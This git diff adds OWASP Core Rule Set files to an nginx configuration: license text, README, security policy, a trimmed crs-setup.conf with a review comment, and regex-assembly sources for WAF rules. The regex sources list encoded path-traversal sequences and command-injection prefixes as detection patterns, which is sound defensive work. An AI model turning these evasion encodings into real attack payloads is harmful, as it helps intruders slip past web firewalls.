+ on behalf of whom a Contribution has been received by Licensor and
+ subsequently incorporated within the Work.
+
+ 2. Grant of Copyright License. Subject to the terms and conditions of
+ this License, each Contributor hereby grants to You a perpetual,
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+ copyright license to reproduce, prepare Derivative Works of,
+ publicly display, publicly perform, sublicense, and distribute the
+ Work and such Derivative Works in Source or Object form.
+
+ 3. Grant of Patent License. 
Subject to the terms and conditions of
+ this License, each Contributor hereby grants to You a perpetual,
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+ (except as stated in this section) patent license to make, have made,
+ use, offer to sell, sell, import, and otherwise transfer the Work,
+ where such license applies only to those patent claims licensable
+ by such Contributor that are necessarily infringed by their
+ Contribution(s) alone or by combination of their Contribution(s)
+ with the Work to which such Contribution(s) was submitted. If You
+ institute patent litigation against any entity (including a
+ cross-claim or counterclaim in a lawsuit) alleging that the Work
+ or a Contribution incorporated within the Work constitutes direct
+ or contributory patent infringement, then any patent licenses
+ granted to You under this License for that Work shall terminate
+ as of the date such litigation is filed.
+
+ 4. Redistribution. You may reproduce and distribute copies of the
+ Work or Derivative Works thereof in any medium, with or without
+ modifications, and in Source or Object form, provided that You
+ meet the following conditions:
+
+ (a) You must give any other recipients of the Work or
+ Derivative Works a copy of this License; and
+
+ (b) You must cause any modified files to carry prominent notices
+ stating that You changed the files; and
+
+ (c) You must retain, in the Source form of any Derivative Works
+ that You distribute, all copyright, patent, trademark, and
+ attribution notices from the Source form of the Work,
+ excluding those notices that do not pertain to any part of
+ the Derivative Works; and
+
+ (d) If the Work includes a "NOTICE" text file as part of its
+ distribution, then any Derivative Works that You distribute must
+ include a readable copy of the attribution notices contained
+ within such NOTICE file, excluding those notices that do not
+ pertain to any part of the Derivative Works, in at least one
+ of 
the following places: within a NOTICE text file distributed
+ as part of the Derivative Works; within the Source form or
+ documentation, if provided along with the Derivative Works; or,
+ within a display generated by the Derivative Works, if and
+ wherever such third-party notices normally appear. The contents
+ of the NOTICE file are for informational purposes only and
+ do not modify the License. You may add Your own attribution
+ notices within Derivative Works that You distribute, alongside
+ or as an addendum to the NOTICE text from the Work, provided
+ that such additional attribution notices cannot be construed
+ as modifying the License.
+
+ You may add Your own copyright statement to Your modifications and
+ may provide additional or different license terms and conditions
+ for use, reproduction, or distribution of Your modifications, or
+ for any such Derivative Works as a whole, provided Your use,
+ reproduction, and distribution of the Work otherwise complies with
+ the conditions stated in this License.
+
+ 5. Submission of Contributions. Unless You explicitly state otherwise,
+ any Contribution intentionally submitted for inclusion in the Work
+ by You to the Licensor shall be under the terms and conditions of
+ this License, without any additional terms or conditions.
+ Notwithstanding the above, nothing herein shall supersede or modify
+ the terms of any separate license agreement you may have executed
+ with Licensor regarding such Contributions.
+
+ 6. Trademarks. This License does not grant permission to use the trade
+ names, trademarks, service marks, or product names of the Licensor,
+ except as required for reasonable and customary use in describing the
+ origin of the Work and reproducing the content of the NOTICE file.
+
+ 7. Disclaimer of Warranty. 
Unless required by applicable law or
+ agreed to in writing, Licensor provides the Work (and each
+ Contributor provides its Contributions) on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+ implied, including, without limitation, any warranties or conditions
+ of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
+ PARTICULAR PURPOSE. You are solely responsible for determining the
+ appropriateness of using or redistributing the Work and assume any
+ risks associated with Your exercise of permissions under this License.
+
+ 8. Limitation of Liability. In no event and under no legal theory,
+ whether in tort (including negligence), contract, or otherwise,
+ unless required by applicable law (such as deliberate and grossly
+ negligent acts) or agreed to in writing, shall any Contributor be
+ liable to You for damages, including any direct, indirect, special,
+ incidental, or consequential damages of any character arising as a
+ result of this License or out of the use or inability to use the
+ Work (including but not limited to damages for loss of goodwill,
+ work stoppage, computer failure or malfunction, or any and all
+ other commercial damages or losses), even if such Contributor
+ has been advised of the possibility of such damages.
+
+ 9. Accepting Warranty or Additional Liability. While redistributing
+ the Work or Derivative Works thereof, You may choose to offer,
+ and charge a fee for, acceptance of support, warranty, indemnity,
+ or other liability obligations and/or rights consistent with this
+ License. However, in accepting such obligations, You may act only
+ on Your own behalf and on Your sole responsibility, not on behalf
+ of any other Contributor, and only if You agree to indemnify,
+ defend, and hold each Contributor harmless for any liability
+ incurred by, or claims asserted against, such Contributor by reason
+ of your accepting any such warranty or additional liability. 
+
+ END OF TERMS AND CONDITIONS
+
+ APPENDIX: How to apply the Apache License to your work.
+
+ To apply the Apache License to your work, attach the following
+ boilerplate notice, with the fields enclosed by brackets "[]"
+ replaced with your own identifying information. (Don't include
+ the brackets!) The text should be enclosed in the appropriate
+ comment syntax for the file format. We also recommend that a
+ file or class name and description of purpose be included on the
+ same "printed page" as the copyright notice for easier
+ identification within third-party archives.
+
+ Copyright 2022 Core Rule Set project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
diff --git a/nginx/config/owasp-crs/README.md b/nginx/config/owasp-crs/README.md
new file mode 100644
index 00000000..2b8a0d21
--- /dev/null
+++ b/nginx/config/owasp-crs/README.md
@@ -0,0 +1,33 @@
+![GHA build v4.0/dev](https://github.com/coreruleset/coreruleset/workflows/Regression%20Tests/badge.svg?branch=v4.0%2Fdev)
+![GHA build v3.3/dev](https://github.com/coreruleset/coreruleset/workflows/Regression%20Tests/badge.svg?branch=v3.3%2Fdev)
+![GHA build v3.2/dev](https://github.com/coreruleset/coreruleset/workflows/Regression%20Tests/badge.svg?branch=v3.2%2Fdev)
+[![OWASP Flagship](https://img.shields.io/badge/owasp-flagship%20project-38a047.svg)](https://owasp.org/projects/)
+[![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/1390/badge)](https://bestpractices.coreinfrastructure.org/projects/1390)
+[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)
+
+
+
+# OWASP ModSecurity Core Rule Set (CRS)
+
+The OWASP ModSecurity Core Rule Set (CRS) is a set of generic attack detection rules for use with ModSecurity or compatible web application firewalls. The CRS aims to protect web applications from a wide range of attacks, including the OWASP Top Ten, with a minimum of false alerts.
+
+## CRS Resources
+
+Please see the [OWASP ModSecurity Core Rule Set page](https://coreruleset.org/) to get introduced to the CRS and view resources on installation, configuration, and working with the CRS.
+
+## Contributing to the CRS
+
+We strive to make the OWASP ModSecurity CRS accessible to a wide audience of beginner and experienced users. We are interested in hearing any bug reports, false-positive alert reports, evasions, usability issues, and suggestions for new detections.
+
+[Create an issue on GitHub](https://github.com/coreruleset/coreruleset/issues) to report a false positive or false negative (evasion). Please include your installed version and the relevant portions of your ModSecurity audit log. We will try and address your issue and potentially ask for additional information to reproduce your problem. Please also note that stale issues will be flagged and closed after 120 days. You can search for stale issues with the following [search query](https://github.com/coreruleset/coreruleset/issues?q=label%3A%22Stale+issue%22).
+
+[Sign up for our Google Group](https://groups.google.com/a/owasp.org/g/modsecurity-core-rule-set-project) to ask general usage questions and participate in discussions on the CRS. 
Also [here](https://lists.owasp.org/pipermail/owasp-modsecurity-core-rule-set/index) you can find the archives for the previous mailing list.
+
+[Join the #coreruleset channel on OWASP Slack](https://owasp.slack.com/) to chat about the CRS. ([Click here](https://owasp.org/slack/invite) to get an invitation if you are not yet registered on the OWASP slack. It's open to non-members too.)
+
+## License
+
+Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
+
+The OWASP ModSecurity Core Rule Set is distributed under Apache Software License (ASL) version 2. Please see the enclosed LICENSE file for full details.
diff --git a/nginx/config/owasp-crs/SECURITY.md b/nginx/config/owasp-crs/SECURITY.md
new file mode 100644
index 00000000..f33f8d86
--- /dev/null
+++ b/nginx/config/owasp-crs/SECURITY.md
@@ -0,0 +1,89 @@
+# Security Policy
+
+## Supported Versions
+
+OWASP CRS has two types of releases, Major releases (3.0.0, 3.1.0, 3.2.0 etc.) and point releases (3.0.1, 3.0.2 etc.).
+For more information see our [wiki](https://github.com/coreruleset/coreruleset/wiki/Release-Policy).
+The OWASP CRS officially supports the two latest point releases with severe security patches.
+We are happy to receive and merge PR's that address security issues in older versions of the project, but the team itself may choose not to fix these.
+Along those lines, OWASP CRS team may not issue security notifications for unsupported software.
+
+| Version | Supported |
+| --------- | ------------------ |
+| 4.0.0-RC1 | :x: |
+| 3.3.x | :white_check_mark: |
+| 3.2.x | :white_check_mark: |
+| 3.1.x | :x: |
+| 3.0.x | :x: |
+| 2.x | :x: |
+
+## GPG Signed Releases
+
+Releases are signed using [our GPG key](https://coreruleset.org/security.asc), (fingerprint: 3600 6F0E 0BA1 6783 2158 8211 38EE ACA1 AB8A 6E72). You can verify the release using GPG/PGP compatible tooling.
+
+### Importing the GPG Key
+
+To get our key using gpg: `gpg --keyserver pgp.mit.edu --recv 0x38EEACA1AB8A6E72` (this id should be equal to the last sixteen hex characters in our fingerprint).
+You can also use `gpg --fetch-key https://coreruleset.org/security.asc` directly.
+
+### Verifying the CRS Release
+
+Download the release file and the corresponding signature. 
The following example shows how to do it for `v3.3.2` release:
+
+```bash
+$ wget https://github.com/coreruleset/coreruleset/archive/refs/tags/v3.3.2.tar.gz
+$ wget https://github.com/coreruleset/coreruleset/releases/download/v3.3.2/coreruleset-3.3.2.tar.gz.asc
+```
+
+**Verification**:
+
+```bash
+❯ gpg --verify coreruleset-3.3.2.tar.gz.asc v3.3.2.tar.gz
+gpg: Signature made Wed Jun 30 10:05:48 2021 -03
+gpg: using RSA key 36006F0E0BA167832158821138EEACA1AB8A6E72
+gpg: Good signature from "OWASP Core Rule Set " [unknown]
+gpg: WARNING: This key is not certified with a trusted signature!
+gpg: There is no indication that the signature belongs to the owner.
+Primary key fingerprint: 3600 6F0E 0BA1 6783 2158 8211 38EE ACA1 AB8A 6E72
+```
+
+If the signature was good, the verification succeeded. If you see a warning like the above, it means you know our public key, but you are not trusting it. You can trust it by using the following method:
+
+```bash
+gpg edit-key 36006F0E0BA167832158821138EEACA1AB8A6E72
+gpg> trust
+Your decision: 5 (ultimate trust)
+Are you sure: Yes
+gpg> quit
+```
+
+Then you will see this result when verifying:
+```bash
+gpg --verify coreruleset-3.3.2.tar.gz.asc v3.3.2.tar.gz
+gpg: Signature made Wed Jun 30 15:05:48 2021 CEST
+gpg: using RSA key 36006F0E0BA167832158821138EEACA1AB8A6E72
+gpg: Good signature from "OWASP Core Rule Set " [ultimate]
+```
+
+## Reporting a Vulnerability
+
+We strive to make the OWASP ModSecurity CRS accessible to a wide audience of beginner and experienced users.
+We welcome bug reports, false positive alert reports, evasions, usability issues, and suggestions for new detections.
+Submit these types of non-vulnerability related issues via Github.
+Please include your installed version and the relevant portions of your audit log.
+False negative or common bypasses should [create an issue](https://github.com/coreruleset/coreruleset/issues/new) so they can be addressed. 
+
+Do this before submitting a vulnerability using our email:
+1) Verify that you have the latest version of OWASP CRS.
+2) Validate which Paranoia Level this bypass applies to. If it works in PL4, please send us an email.
+3) If you detected anything that causes unexpected behavior of the engine via manipulation of existing CRS provided rules, please send it by email.
+
+We also provide you with the [Sandbox project](https://coreruleset.org/docs/development/sandbox/), where you can test your bypass and report back to us. If testing using the sandbox, please include the `X-Unique-ID` from the response in your email.
+
+Our email is [security@coreruleset.org](mailto:security@coreruleset.org). You can send us encrypted email using the same GPG key we use to sign releases, fingerprint: `3600 6F0E 0BA1 6783 2158 8211 38EE ACA1 AB8A 6E72`.
+
+We are happy to work with the community to provide CVE identifiers for any discovered security issues if requested.
+
+If in doubt, feel free to reach out to us!
+
+The OWASP ModSecurity CRS Team.
diff --git a/nginx/config/owasp-crs/SPONSORS.md b/nginx/config/owasp-crs/SPONSORS.md
new file mode 100644
index 00000000..79900d90
--- /dev/null
+++ b/nginx/config/owasp-crs/SPONSORS.md
@@ -0,0 +1,9 @@
+## GOLD SPONSORS
+
+* F5 / NGINX
+* Google
+* United Security Providers
+
+## SILVER SPONSORS
+
+* Swiss Post
diff --git a/nginx/config/owasp-crs/crs-setup.conf b/nginx/config/owasp-crs/crs-setup.conf
new file mode 100644
index 00000000..8c808d10
--- /dev/null
+++ b/nginx/config/owasp-crs/crs-setup.conf
@@ -0,0 +1,103 @@
+
+
+# SecDefaultAction "phase:1,log,auditlog,pass"
+# SecDefaultAction "phase:2,log,auditlog,pass"
+
+# SecDefaultAction "phase:1,nolog,auditlog,pass"
+# SecDefaultAction "phase:2,nolog,auditlog,pass"
+
+# SecDefaultAction "phase:1,log,auditlog,deny,status:403"
+# SecDefaultAction "phase:2,log,auditlog,deny,status:403"
+
+# SecDefaultAction "phase:1,log,auditlog,redirect:'http://%{request_headers.host}/',tag:'Host: %{request_headers.host}'"
+# SecDefaultAction "phase:2,log,auditlog,redirect:'http://%{request_headers.host}/',tag:'Host: %{request_headers.host}'"
+
+
+#SecAction \
+# "id:900000,\
+# phase:1,\
+# pass,\
+# t:none,\
+# nolog,\
+# setvar:tx.blocking_paranoia_level=1"
+
+#SecAction \
+# "id:900001,\
+# phase:1,\
+# pass,\
+# t:none,\
+# nolog,\
+# setvar:tx.detection_paranoia_level=1"
+
+#SecAction \
+# "id:900010,\
+# phase:1,\
+# pass,\
+# t:none,\
+# nolog,\
+# setvar:tx.enforce_bodyproc_urlencoded=1"
+
+
+#SecAction \
+# "id:900100,\
+# phase:1,\
+# pass,\
+# t:none,\
+# nolog,\
+# setvar:tx.critical_anomaly_score=5,\
+# setvar:tx.error_anomaly_score=4,\
+# setvar:tx.warning_anomaly_score=3,\
+# setvar:tx.notice_anomaly_score=2"
+
+#SecAction \
+# "id:900110,\
+# phase:1,\
+# pass,\
+# t:none,\
+# nolog,\
+# setvar:tx.inbound_anomaly_score_threshold=5,\
+# setvar:tx.outbound_anomaly_score_threshold=4"
+
+#SecAction \
+# "id:900115,\
+# phase:1,\
+# pass,\
+# t:none,\
+# nolog,\
+# setvar:tx.reporting_level=4"
+
+#SecAction \
+# "id:900120,\
+# phase:1,\
+# pass,\
+# t:none,\
+# nolog,\
+# setvar:tx.early_blocking=1"
+
+
+#SecAction \
+# "id:900130,\
+# phase:1,\
+# pass,\
+# t:none,\
+# nolog,\
+# setvar:tx.enable_default_collections=1"
+
+
+#SecAction \
+# "id:900200,\
+# phase:1,\
+# pass,\
+# t:none,\
+# nolog,\
+# setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'"
+
+# SecCollectionTimeout 600
+
+SecAction \
+ "id:900990,\
+ phase:1,\
+ pass,\
+ t:none,\
+ nolog,\
+ setvar:tx.crs_setup_version=400"
\ No newline at end of file
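Review bot: The only live directive in this trimmed crs-setup.conf is rule 900990 with `setvar:tx.crs_setup_version=400`, and nothing in the file records where it came from or what was cut, so a reader cannot tell whether anomaly scoring at paranoia level 1 with thresholds 5/4 and the engine's default `SecDefaultAction` were deliberately chosen or merely left behind when the upstream comments were stripped. A header such as `# Trimmed from upstream OWASP CRS crs-setup.conf (4.0.x); all tuning blocks below are left at upstream defaults` and `# tx.crs_setup_version must be bumped in lockstep with the rule files this is included with` would fix that, since the CRS initialization rules presumably compare this value against the installed rules at startup and refuse to load on a mismatch. The commented `redirect:'http://%{request_headers.host}/'` variants of `SecDefaultAction` derive the redirect target from the client-supplied Host header over plain http; if one of them is ever enabled it should name a fixed URL instead. The same commit also vendors upstream files the engine never reads (regex-assembly/*.ra, docs/, SPONSORS.md); keeping only crs-setup.conf, the rules directory and plugins/ — or pinning a signed release tarball as SECURITY.md describes — would keep the runtime config tree reviewable and its CRS version identifiable.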
diff --git a/nginx/config/owasp-crs/docs/README b/nginx/config/owasp-crs/docs/README
new file mode 100644
index 00000000..aa961033
--- /dev/null
+++ b/nginx/config/owasp-crs/docs/README
@@ -0,0 +1,17 @@
+Welcome to the OWASP Core Rule Set (CRS) documentation.
+
+The latest version of the documentation can be read at:
+https://coreruleset.org/docs/
+
+The OWASP CRS documentation is generated by Hugo and is stored
+in a separate Github repository:
+https://github.com/coreruleset/documentation/
+
+While the documentation is available as part of the CRS project,
+it is provided in the form of a Git submodule. Using a Git
+submodule allows us to update the documentation without making
+changes to the main rule repository.
+
+You can download the documentation using git:
+
+ git submodule update --init docs
diff --git a/nginx/config/owasp-crs/plugins/README.md b/nginx/config/owasp-crs/plugins/README.md
new file mode 100644
index 00000000..4c2cc9d4
--- /dev/null
+++ b/nginx/config/owasp-crs/plugins/README.md
@@ -0,0 +1,7 @@
+This is the folder where you install CRS plugins.
+
+See https://github.com/coreruleset/plugin-registry
+for a list of registered official and 3rd party plugins.
+
+Plugins are documented in the CRS INSTALL file and
+in also with said plugin registry.
diff --git a/nginx/config/owasp-crs/plugins/empty-after.conf b/nginx/config/owasp-crs/plugins/empty-after.conf
new file mode 100644
index 00000000..e69de29b
diff --git a/nginx/config/owasp-crs/plugins/empty-before.conf b/nginx/config/owasp-crs/plugins/empty-before.conf
new file mode 100644
index 00000000..e69de29b
diff --git a/nginx/config/owasp-crs/plugins/empty-config.conf b/nginx/config/owasp-crs/plugins/empty-config.conf
new file mode 100644
index 00000000..e69de29b
diff --git a/nginx/config/owasp-crs/regex-assembly/920100.ra b/nginx/config/owasp-crs/regex-assembly/920100.ra
new file mode 100644
index 00000000..aafa2868
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/920100.ra
@@ -0,0 +1,23 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##! Cover the GET method +##! | Path |--- Query ---| Fragment | +^get /[^?#]*(?:\?[^#\s]*)?(?:#[\S]*)?$ + +##! Cover the CONNECT method +##! Meth |----- IPv4 Address ------|- Port -| Protocol | +^connect (?:\d{1,3}\.){3}\d{1,3}\.?(?::\d+)?\s+[\w\./]+$ + +##! Meth |- Host --|Prt| Protocol | +^connect [\w\-\./]+:\d+\s+[\w\./]+$ + +##! Cover the OPTIONS method +##! Meth |*| Protocol | +^options \*\s+[\w\./]+$ + +##! Cover other methods of the form METHOD [[scheme]://[host][:port]]/path[?query][#fragment] protocol +##! Method ---|- Scheme:// -|- Host --|-- Port --| Path |--- Query ---| Fragment | Protocol | +^[a-z]{3,10}\s+(?:\w{3,7}?://[\w\-\./]*(?::\d+)?)?/[^?#]*(?:\?[^#\s]*)?(?:#[\S]*)?\s+[\w\./]+$ diff --git a/nginx/config/owasp-crs/regex-assembly/920120.ra b/nginx/config/owasp-crs/regex-assembly/920120.ra new file mode 100644 index 00000000..ef67c2e8 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/920120.ra @@ -0,0 +1,27 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! The HTML entities included in the expression are a best guess selection of frequently +##! used entities. Including too many would further reduce the performance of the expression +##! but there may well be additional entities that would make sense to add to the list. +##! The official list of entities is hosted by the WHATWG: +##! https://html.spec.whatwg.org/multipage/named-characters.html#named-character-references + +##!+ i + +##!^ ^ +##!$ *$ + +&[aeiouclnrszg]acute; +&[cdelnrstz]caron; +&[cgklnrst]cedil; +&[aeioucghjswy]circ; +&[aeiou]grave; +&[au]ring; +&[anoi]tilde; +&[aeiouy]uml; +& +' +  +ø +[^'\";=] diff --git a/nginx/config/owasp-crs/regex-assembly/920260.ra b/nginx/config/owasp-crs/regex-assembly/920260.ra new file mode 100644 index 00000000..8bfd4a41 --- /dev/null 
+++ b/nginx/config/owasp-crs/regex-assembly/920260.ra
@@ -0,0 +1,6 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+%uff[0-9a-f]{2}
diff --git a/nginx/config/owasp-crs/regex-assembly/920521.ra b/nginx/config/owasp-crs/regex-assembly/920521.ra
new file mode 100644
index 00000000..ac81329b
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/920521.ra
@@ -0,0 +1,18 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! Current Accept-Encoding headers
+br
+compress
+deflate
+gzip
+identity
+\*
+^$
+##! Deprecated Accept-Encoding headers
+aes128gcm
+exi
+pack200-gzip
+zstd
+x-compress
+x-gzip
diff --git a/nginx/config/owasp-crs/regex-assembly/920600.ra b/nginx/config/owasp-crs/regex-assembly/920600.ra
new file mode 100644
index 00000000..cdc7303b
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/920600.ra
@@ -0,0 +1,4 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!> include charset-specification
diff --git a/nginx/config/owasp-crs/regex-assembly/921421.ra b/nginx/config/owasp-crs/regex-assembly/921421.ra
new file mode 100644
index 00000000..f796caec
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/921421.ra
@@ -0,0 +1,17 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! Attacks attempting bypass by forcing JSON body processor leveraging recommended rule 200000
+##! Find Content-Type: application/x-www-form-urlencoded;boundary="application/json"
+##! Find Content-Type: application/soap+xml;boundary="application/json"
+^[^;\s,]+[;\s,].*?application\/json
+
+##! Attacks attempting bypass by forcing JSON body processor leveraging recommended rule 200006
+##! Find Content-Type: application/x-www-form-urlencoded;boundary="application/some.vendor+json"
+##! Find Content-Type: application/soap+xml;boundary="application/some.vendor+json"
+^[^;\s,]+[;\s,].*?application\/.+[+]json
+
+##! Attacks attempting bypass by forcing XML body processor leveraging recommended rule 200001
+##! Find Content-Type: application/x-www-form-urlencoded;boundary="application/xml"
+##! Find Content-Type: application/json;boundary="application/soap+xml"
+^[^;\s,]+[;\s,].*?(?:application(?:\/soap\+|\/)|text\/)xml
diff --git a/nginx/config/owasp-crs/regex-assembly/921422.ra b/nginx/config/owasp-crs/regex-assembly/921422.ra
new file mode 100644
index 00000000..5b70a561
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/921422.ra
@@ -0,0 +1,9 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! Attacks attempting to bypass content-type restrictions or behaviour
+##! Find Content-Type: application/x-www-form-urlencoded;boundary="multipart/form-data"
+##! Find Content-Type: application/soap-xml;boundary="multipart/form-data"
+^[^;\s,]+[;\s,].*?\b(text|multipart|application)\b
+^[^;\s,]+[;\s,].*?\b(audio|image|video|csv|css|vnd|pdf|plain|json|soap|xml|x-www-form-urlencoded|form-data|related|x-amf|octet|stream|csp|report)\b
+^[^;\s,]+[;\s,].*?\b(\/|\+)\b
diff --git a/nginx/config/owasp-crs/regex-assembly/922110-chain1.ra b/nginx/config/owasp-crs/regex-assembly/922110-chain1.ra
new file mode 100644
index 00000000..cdc7303b
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/922110-chain1.ra
@@ -0,0 +1,4 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!> include charset-specification
diff --git a/nginx/config/owasp-crs/regex-assembly/930100.ra b/nginx/config/owasp-crs/regex-assembly/930100.ra
new file mode 100644
index 00000000..769c9fae
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/930100.ra
@@ -0,0 +1,110 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! Source: https://github.com/wireghoul/dotdotpwn/blob/master/DotDotPwn/TraversalEngine.pm
+##! Attack description: https://doc.lagout.org/security/McGraw.Hill.HackNotes.Web.Security.Portable.Reference.eBook-DDU.pdf
+##! Excerpt:
+##! In short, IIS turns %c0%af into
+##! the ASCII / character, but parses it at a point where security checks for
+##! ‘../’ traversals have already occurred!
+##! What has really happened? The attack uses an overlong Unicode
+##! representation for a forward or backward slash (/ or \).
+##! Unicode permits multibyte encoding of the same character.
+##! The fundamental representation can be referred to as a one (character) to one (byte field)
+##! representation. The overlong representation is a one (character) to many
+##! (bytes) version.
+##! Two more valid strings that represent the backward slash are %c1%1c
+##! and %c1%9c. The difference between these two hex values is 128. More
+##! valid slash representations boil down to a matter of math. For example,
+##! %c0%9v works even though %9v isn’t a hexadecimal value. Try adding
+##! the value for “9” (57) to “v” (118); if the result is greater than 127, then
+##! subtract 128—hint, the final result should be 47.
+
+##!+ i
+
+##! slash patterns
+##!> assemble
+ \x5c
+ ##! URI encoded
+ %2f
+ %5c
+ ##! Hex encoded
+ 0x2f
+ 0x5c
+ ##! Double URI encoded
+ %252f
+ %255c
+ ##! Overlong Unicode sequences (target IIS)
+ %c0%2f
+ %c0%af
+ %c0%5c
+ %c1%9c
+ %c1%pc
+ %c0%9v
+ %c0%qf
+ %c1%8s
+ %c1%1c
+ %c1%af
+ %bg%qf
+ ##! Unicode 16 "alternative" glyphs
+ %u2215
+ %u2216
+ ##! Unknown
+ %uEFC8
+ %uF025
+ ##! More double encoding and variations on the above
+ %%32%%66
+ %%35%%63
+ %e0%80%af
+ %25c1%259c
+ %25c0%25af
+ %f0%80%80%af
+ %f8%80%80%80%af
+ %2%46
+ %%32%46
+ %%32F
+ %u002f
+ %1u
+ /
+ ##!=< slashes
+ ##!=> slashes
+
+ ##! dot patterns
+ ##! 
These use the same techniques as for slashes to evade the detection of '.'
+ \.
+ \.%00
+ \.%01
+ \.\?
+ \?\.
+ \?
+ %2e
+ 0x2e
+ %c0\.
+ %252e
+ %c0%2e
+ %c0%ae
+ %c0%5e
+ %c0%ee
+ %c0%fe
+ %uff0e
+ %%32%%65
+ %e0%80%ae
+ %25c0%25ae
+ %f0%80%80%ae
+ %f8%80%80%80%ae
+ %fc%80%80%80%80%ae
+ %2%45
+ %u002e
+ %uff0e
+ %u2024
+ %%32%45
+ %%32E
+ %c0%6e
+ ##!=>
+
+ ##! Append {2,3} to the result, as we're looking for two or three dots (e.g. /../, /.../)
+ {2,3}
+ ##!=>
+
+ ##!=> slashes
+##!<
diff --git a/nginx/config/owasp-crs/regex-assembly/931130.ra b/nginx/config/owasp-crs/regex-assembly/931130.ra
new file mode 100644
index 00000000..558f5da4
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/931130.ra
@@ -0,0 +1,17 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! ATTENTION: The rule files 931130.data and 931131.data are meant to be kept in sync.
+##! They should result in the same regular expression used on different targets in different phases.
+
+##!+ i
+
+##!> assemble
+ ##!=>
+ (?:(?:url|jar):)?
+ ##!=>
+ ##!> include url-schemes
+ ##!=>
+ ://(?:[^@]+@)?([^/]*)
+ ##!=>
+##!<
diff --git a/nginx/config/owasp-crs/regex-assembly/931131.ra b/nginx/config/owasp-crs/regex-assembly/931131.ra
new file mode 100644
index 00000000..aef8b0ee
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/931131.ra
@@ -0,0 +1,17 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! ATTENTION: The rule files 931129.data and 931131.data are meant to be kept in sync.
+##! They should result in the same regular expression used on different targets in different phases.
+
+##!+ i
+
+##!> assemble
+ ##!=>
+ (?:(?:url|jar):)?
+ ##!=>
+ ##!> include url-schemes
+ ##!=>
+ ://(?:[^@]+@)?([^/]*)
+ ##!=>
+##!<
diff --git a/nginx/config/owasp-crs/regex-assembly/932125.ra b/nginx/config/owasp-crs/regex-assembly/932125.ra
new file mode 100644
index 00000000..2a69987a
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/932125.ra
@@ -0,0 +1,235 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! Word list for rule 932125 (RCE Windows command injection - PowerShell aliases)
+##!
+##! This list comes from the powershell source code. Can be updated using this oneliner:
+##! curl -s https://raw.githubusercontent.com/PowerShell/PowerShell/master/src/System.Management.Automation/engine/InitialSessionState.cs -o - | awk -F\" '/new SessionStateAliasEntry\("/ { print $2; }'
+##! To prevent some FP for a command, you can require command parameters
+##! after a command. Only do this if the command regularly causes FP and if
+##! allowing the bare command (without parameters) is not too dangerous.
+##! (Note: due to \b following the regexp, a word boundary is also required
+##! further on, so some letter/number is needed for a match). Example:
+##!
+##! diff@
+
+##!+ i
+
+##! Note: the quoting prefixes are part of the command prefixes, except for ^
+##! which, for unknown reasons, is not part of the expression
+
+##! extension/switches suffix
+##! cmd.com, cmd.exe, etc.
+##!$ (?:\.[\"\^]*\w+)?
+##! cmd/h
+##!$ \b
+
+##! starting tokens prefix
+##!> assemble
+ ##! ;cmd
+ ;
+ ##! {cmd
+ \{
+ ##! |cmd
+ \|
+ ##! ||cmd
+ \|\|
+ ##! &cmd
+ &
+ ##! &&cmd
+ &&
+ ##! \ncmd
+ \n
+ ##! \rcmd
+ \r
+ ##! `cmd
+ `
+ ##!=>
+
+ ##! match possible white space between prefix expressions
+ \s*
+ ##!=>
+
+ ##! commands prefix
+ ##!> assemble
+ ##! (cmd)
+ \(
+ ##! ,cmd
+ ,
+ ##! @cmd
+ @
+ ##! 'cmd'
+ '
+ ##! "cmd"
+ \"
+ ##! spacing+cmd
+ \s
+ ##!<
+ ##!=>
+
+ *
+ ##!=>
+
+ ##! paths prefix
+ ##!> assemble
+ ##! /path/cmd
+ [\w'\"\./]+/
+ ##! C:\Program Files\cmd
+ [\x5c'\"\^]*\w[\x5c'\"\^]*:.*\x5c
+ ##! \\net\share\dir\cmd
+ [\^\.\w '\"/\x5c]*\x5c
+ ##!<
+ ##!=>
+
+ ?[\"\^]*
+ ##!=>
+
